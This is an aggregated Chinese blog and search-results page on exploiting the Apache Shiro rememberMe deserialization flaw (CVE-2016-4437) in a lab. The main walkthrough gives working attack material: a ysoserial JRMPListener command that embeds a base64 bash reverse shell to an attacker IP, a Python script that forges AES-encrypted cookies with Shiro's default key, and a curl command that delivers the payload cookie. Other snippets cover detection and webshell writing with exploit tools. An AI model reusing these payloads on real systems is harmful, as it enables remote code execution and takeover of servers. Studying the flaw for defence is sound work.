精华内容
下载资源
问答
  • shiro反序列化工具
    2022-04-12 13:32:21

    每天一个漏洞之——shiro反序列化
    原因:Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。这个AES解密类似于md5加密过程中使用的盐,简单的理解为这个shiro框架泄露了相应的AES密钥
    出现的标志:返回数据包中出现rememberMe=deleteme字样,说明此系统使用的为shiro框架,即可使用对应的工具进行检测
    目前各种工具的原理大体相同:爆破AES密钥,爆破构造链,回显利用,和fastjson类似,都可以利用dnslog判断
    利用方法
    手工验证:https://www.cnblogs.com/xiaozi/p/13239046.html
    工具验证:2022最新版kali不支持jdk版本切换,默认版本不支持相应工具运行,经我测试jdk1.8版本可以完美运行
    推荐两个工具,:shiro_tools.jar 命令行输入 java -jar shiro_tools.jar 目标url 即可一键化自动检测
    另外一个也就是耳熟能详的的shiro_attack-4.5.2-SNAPSHOT-all.jar
    java -jar shiro_attack-4.5.2-SNAPSHOT-all.jar即可展现对应的图形化界面,输入url即可,不再赘述

    安装1.8版本idk
    https://blog.csdn.net/JakeLinfly/article/details/106853964

    更多相关内容
  • shiro反序列化工具

    2022-02-11 17:38:06
    shiro反序列化工具
  • shiro反序列化复现.zip

    2019-08-03 23:37:14
    shiro反序列化复现工具包;shiro反序列化复现工具包;
  • shiro反序列测试工具包,两个使用任意一个即可
  • 反序列化利用工具
  • shiro反序列化

    2022-04-22 13:30:00
    shiro反序列化 1 原理 2 复现方式 3 待解决的问题 4 参考链接 CVE-2016-4437 服务器:192.168.43.127 攻击机:192.168.43.149 1 原理 shiro有记住密码的功能,密码是一段存储的cookie,其中shiro记住密码,功能...

    shiro反序列化

    CVE-2016-4437
    服务器:192.168.43.127
    攻击机:192.168.43.149

    1 原理

    shiro有记住密码的功能,密码是一段存储的cookie,其中shiro记住密码,功能就是下次登录不用再输入密码了,走了以下流程 反序列化-base64-aes加密,可以伪造一个带有bash反弹shell的cookie,流程暂定,还需要再次确认。

    http://192.168.43.127:8080
    样子
    在这里插入图片描述
    特征
    在这里插入图片描述
    burp-shiro插件也检测出来了key

    在这里插入图片描述

    2 复现方式

    (1)使用现成的工具,一键利用,反弹shell
    工具下载链接
    目测dnslog可以成功,其他都不行
    无需选择,自动跑
    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述
    反弹shell,在kali机开启监听
    在这里插入图片描述
    在这里插入图片描述
    kali接收到shell在这里插入图片描述

    (2)使用反序列化,暂时不太成功,暂时拿不到反弹的shell,正在反思原因,反思后,问题解决,使用CommonsCollections6

    • java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections6 “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjE0OS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-I}”
      bash往192.168.43.149弹shell
      在这里插入图片描述
    • python3 shiro.py 192.168.43.149:6666

    在这里插入图片描述

    • 发送payload,200成功
      在这里插入图片描述

    • 弹回来shell
      在这里插入图片描述

    发送cookie的curl方法,虽然是405,也可以弹回来shell
    实际测试,即使不加/doLogin,直接给端口发也可以成功
    curl -H “Cookie:rememberMe=dX3OOTh9SgeaquQwE0rhN5uE9GvMyuGHY212yGd+WfCLN2Wh7tj2bsFbYr4bFbxrQkuqNP8EKOuVImFxBSc+wdNP3jZprzQESs2rsfYt+EoIZ1PVES9ef43sC4CgC5hJXPUAVq2OWXmv+f6Nd1UV7AH8wtuN0frTWF1f6188Te3gQ5QZKAi3k5PF9RAFQMG5xWBhxr4UR/dX+aMZdcc4z5SdjoUX9qlGg3lnnUSjeAA+JT4akLH2QR7TTjYUu6XyDzOXLfgoZNzb1oVcj2bPDPZOguWdRfQ9j6lFa3TauxBUhx3qnUaixfo94hvNWITOE9EkC842B83IPEFAb4/t/CmJGJ7EiIv+RIjdE8EssPgtNZbuptdXKYkCMGmtDW4+i3Aa+pZ/enAJhTlOoJ6gIQ==” -I http://192.168.43.127:8080/doLogin

    在这里插入图片描述
    在这里插入图片描述

    shiro.py的源码

    import sys
    import uuid
    import base64
    import subprocess
    from Crypto.Cipher import AES
    def encode_rememberme(command):
        popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
        BS = AES.block_size
        pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
        key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
        iv = uuid.uuid4().bytes
        encryptor = AES.new(key, AES.MODE_CBC, iv)
        file_body = pad(popen.stdout.read())
        base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
        return base64_ciphertext
    
    
    if __name__ == '__main__':
        payload = encode_rememberme(sys.argv[1])    
        print("encode_rememberMe={0}".format(payload.decode()))
    

    在这里插入图片描述

    3 待解决的问题

    • key是什么,作用是什么
    • cookie识别调用的过程
    • 生成cookie的代码是否可以自己写,其中网上错误的代码导致报错,原因是print少了一对括号,还是要有自己的判断能力。在这里插入图片描述

    在这里插入图片描述

    错误示范

    • kail使用ysoserial启一个1099端口
      那一段是bash反弹shell经过base64加密的代码,但是CommonsCollections4无法成功

      java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 “bash -c {echo,YmFzaCAtaSAgPiYgIC9kZXYvdGNwLzE5Mi4xNjguNDMuMTQ5Lzk5OTkgMD4mMQo=}|{base64,-d}|{bash,-i}”

    在这里插入图片描述

    4 参考链接

    (1)https://xz.aliyun.com/t/9488			#反弹shell的其他形式
     (2) https://blog.csdn.net/m0_48520508/article/details/107770264?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162079768016780269831639%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=162079768016780269831639&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-3-107770264.first_rank_v2_pc_rank_v29&utm_term=cve-2016-4437			#maven和ysoserial配置
    

    在这里插入图片描述

    展开全文
  • 图形界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果...
  • shiro 反序列化 _CVE-2016-4437

    千次阅读 2021-12-28 14:08:09
    1.环境搭建 实验靶机:CentOS7(192.168.2.102) 攻击机:Kali-Linux(192.168.2...下载shiro反序列化工具: Release ShiroExploit v2.3 · feihong-cs/ShiroExploit-Deprecated (github.com) 填入靶机地址: 对kal

    1.环境搭建

    实验靶机:CentOS7(192.168.2.102)

    攻击机:Kali-Linux(192.168.2.101)

    在CentOS7开启docker容器:

    浏览器登录192.168.2.102:8080

    2.漏洞利用

    影响版本:Apache Shiro <= 1.2.4

    下载shiro反序列化工具:

    Release ShiroExploit v2.3 · feihong-cs/ShiroExploit-Deprecated (github.com)

    填入靶机地址:

    对kali的9999端口进行监听:

    点击执行:

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JIYV23xh-1640671674023)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211225131031.png)]

    可以看到shell反弹成功,获取root权限

    利用的的反弹shell:

    bash -i >& /dev/tcp/IP/PORT 0>&1
    

    放到网站上进行加密java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)

    3.漏洞分析

    漏洞原因:

    Apache Shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:得到rememberMe的cookie值 > Base64解码–>AES解密–>反序列化。然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

    漏洞特征:

    shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段

    展开全文
  • shiro反序列化脚本.zip

    2021-07-28 00:22:47
    需要用到的俩个文件 ysoserial-master.jar 和 poc.py
  • shiro 反序列漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
  • Shiro反序列化的检测与利用

    千次阅读 2021-02-25 09:47:16
    1. 前言 Shiro 是 Apache 旗下的一个用于权限管理的开源框架,提供开箱即用的身份验证、授权、密码套件和会话管理等功能。 2. 环境搭建 环境搭建vulhub ...4. 自动检测Shiro反序列化之burp插件 https://g

    1. 前言

    Shiro 是 Apache 旗下的一个用于权限管理的开源框架,提供开箱即用的身份验证、授权、密码套件和会话管理等功能。

    2. 环境搭建

    环境搭建vulhub

    3. 如何发现

    第一种情况

    返回包中包含rememberMe=deleteMe这个字段

    第二种情况

    直接发送原数据包,返回的数据中不存在关键字
    可以通过在发送数据包的cookie中增加字段:
    rememberMe=deleteMe
    然后查看返回数据包中是否存在关键字。

    4. 自动检测Shiro反序列化之burp插件

    https://github.com/Daybr4ak/ShiroScan

    使用效果

    5. 利用漏洞进行攻击

    通过以上内容,我们已经找到burp,接下来就是进行攻击利用。

    直接上工具:

    没有工具的可以去这篇文章下下载:
    [https://bbs.zkaq.cn/Index/s/yBAwHerO

    ]()

    步骤1

    步骤2

    步骤3

    6. 反弹shell

    现在kali开启监听

    工具执行

    反弹成功

    7. 写入webshell

    同样的原理可以写webshell,有时候自带的木马写不成功。

    可以换成自己的马木,如冰蝎自带的。

    写入webshell

    链接冰蝎

    Webshell管理工具连接不上。

    换个工具继续怼

    https://github.com/j1anFen/shiro_attack

    蚁剑链接

    注意:蚁剑马->CUSTOM类型->请求返回均hex编码

    至此Shiro的整个发现,利用的整个过程。

    展开全文
  • Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞。
  • shiro反序列化进攻综合利用项目基于javafx,利用shiro反序列化扩展进行回显命令执行以及注入类别内存马检出唯一密钥(SimplePrincipalCollection)cbc / gcm Tomcat / Springboot回显命令执行集成公用集合K1 / K2...
  • 漏洞检测工具
  • Part1 前言这个小工具的编写源于一个HW蓝队项目,我曾经作为蓝队人员值守了2周,期间发现很多蓝队人员对于反序列化系列漏洞原理不清楚,导致对设备告警的各种反序列化攻击不能有效地研判,也就是说不能底气十足地...
  • [Java反序列化]—Shiro反序列化(三)

    千次阅读 2022-06-29 07:14:00
    所以本篇就对shiro的原生依赖的利用进行分析在了解前先了解下定义类必是具体的和公共的,并且具有无参数的。JavaBean 通过提供符合一致性设计模式的公共方法将内部域暴露成员属性,set和get方法获取。(大概意思就是...
  • 本文主要介绍shiro反序列漏洞综合利用工具的安装过程。
  • Apache shiro 反序列化及利用链

    千次阅读 2022-04-27 20:30:45
    反序列化 decrypt 解密 函数需要通过key 解密 密钥值是固定的 触发反序列化流程:读取cookie -> base64解码 -> AES解密 -> 反序列化 DNS可以出网,使用dnslog进行攻击 结合Dnslog与URLDNS...
  • shiro使用的版本是1.2.4,存在反序列化漏洞,我们采取的办法是手动升级到了1.2.6版本,但苦于无法验证是否解决了问题,后来发现了一款测试工具,ShiroExploit。 测试工具下载地址 ... 反序列化漏洞是如何产生的?...
  • 1.shiro反序列漏洞、暴力破解漏洞检测工具源码 2.shiro反序列漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
  • [Java反序列化]—Shiro反序列化(二)

    千次阅读 2022-06-28 08:21:38
    前篇通过urldns链来检测了shiro550反序列化的存在,本篇就通过CC链来进行shiro的代码执行shiro中默认是没有CC依赖的,所以需要我们自行加上直接用CC6的链来打,提示类加载不到是一个JVM的标记,说明实际上这是一个...
  • Shiro_exploit用于检测与利用Apache Shiro反序列漏洞脚本。可以帮助企业发现自身安全漏洞。 该脚本通过网络收集到的22个键,利用ysererial工具中的URLDNS这个Gadget,并结合dnslog平台实现入侵检测。突破利用则...
  • msfvenom生成Linux后门程序,这里刚开始我是使用的cobaltstrike中生成的Java后门程序发现行不通可能是因为目标...在工具内进行功能区的利用,在爆破完成后,对目标进行目录扫描。【记得开代理】kali中开个小代理。...
  • Part1 前言Shiro反序列漏洞虽然出现很多年了,但是在平时的攻防比赛与红队评估项目中还是能遇到。主站也许遇不到Shiro漏洞,但是主站边缘域名、全资子公司的子域名、边缘资产、微信公众号、微信小程序啥的,总能...
  • Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。 二、环境搭建 ...
  • 漏洞复现——shiro反序列化

    千次阅读 2022-05-22 21:42:43
    漏洞复现——shiro反序列化
  • 今天又是一天打工人,日常挖洞,结果盆友给了一个shiro反序列化洞,默认密钥,可真是激动的心颤抖的手,大清早让人莫名兴奋,心里还在想这是昨天熬夜的奖励嘛,来的这么突然,于是赶紧掏出了shiro反序列化利用工具,...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 3,080
精华内容 1,232
关键字:

shiro反序列化工具